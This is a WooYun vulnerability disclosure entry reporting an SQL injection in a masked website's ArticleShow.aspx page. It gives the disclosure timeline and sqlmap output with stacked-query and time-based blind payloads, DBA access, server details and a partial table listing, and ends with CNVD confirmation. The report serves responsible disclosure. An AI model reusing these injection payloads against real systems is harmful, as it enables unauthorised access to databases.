乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-10: 厂商已经确认,细节仅向厂商公开 2015-12-20: 细节向核心白帽子及相关领域专家公开 2015-12-30: 细节向普通白帽子公开 2016-01-09: 细节向实习白帽子公开 2016-01-23: 细节向公众公开
如上
注入点http://**.**.**.**/ActicleShow.aspx?SectionId=56f313f6-1a75-4df4-9d0e-eed964132382 5个库
DBA权限
当前库
312个表
Place: GETParameter: SectionId Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: SectionId=56f313f6-1a75-4df4-9d0e-eed964132382'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: SectionId=56f313f6-1a75-4df4-9d0e-eed964132382' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005current database: 'New_sy_core_ZkyYw'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: SectionId Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: SectionId=56f313f6-1a75-4df4-9d0e-eed964132382'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: SectionId=56f313f6-1a75-4df4-9d0e-eed964132382' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005Database: New_sy_core_ZkyYw[312 tables]+---------------------------------------------+| AccessToRecords || Access_to_records_View || Album || Album_File || Album_File_Chapter || Album_File_Chapter_view || Album_Fled || Album_Record || Answer || Article_view_Recom_Article || AttributeAdd || AuditRecord || Billing || Billing_Type || Catalog_Album || Catalog_Field || Catalog_Field_ViewWarehouse_Field || Catalog_Field_ViewWarehouse_FieldAlbum_Fled || Catalog_Role || Catalog_ViewGetLoadByList || Change_QuestionsInfomation || Change_QuestionsInfomation2 |
不再深入
危害等级:高
漏洞Rank:10
确认时间:2015-12-10 17:40
CNVD确认并复现所述情况,已经转由CNCERT向中科院上级主管部门通报,由其后续协调网站管理单位处置.
暂无